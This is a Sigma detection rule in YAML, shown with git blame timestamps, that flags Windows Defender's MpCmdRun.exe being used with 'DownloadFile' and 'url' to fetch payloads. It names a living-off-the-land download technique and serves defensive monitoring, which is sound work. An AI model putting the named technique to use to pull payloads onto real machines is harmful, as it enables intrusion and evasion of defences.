SigmaHQ/rules/windows/process_creation/win_susp_mpcmdrun_download.yml

32 lines
888 B
YAML
Raw Normal View History

title: Windows Defender Download Activity
id: 46123129-1024-423e-9fae-43af4a0fa9a5
2020-09-04 14:00:23 +00:00
status: experimental
description: Detect the use of Windows Defender to download payloads
2020-09-04 14:00:23 +00:00
author: Matthew Matchen
date: 2020/09/04
references:
- https://twitter.com/djmtshepana/status/1301608169496612866
- https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
tags:
- attack.defense_evasion
- attack.t1218.010
2020-09-05 07:17:23 +00:00
- attack.command_and_control
- attack.t1105
2020-09-04 14:00:23 +00:00
logsource:
category: process_creation
product: windows
detection:
selection1:
- CommandLine|contains: 'MpCmdRun.exe'
- Description: 'Microsoft Malware Protection Command Line Utility'
2020-09-04 14:00:23 +00:00
selection2:
2020-09-04 14:50:57 +00:00
CommandLine|contains|all:
- 'DownloadFile'
- 'url'
condition: selection1 and selection2
2020-09-04 14:00:23 +00:00
fields:
- CommandLine
falsepositives:
- Unknown
level: high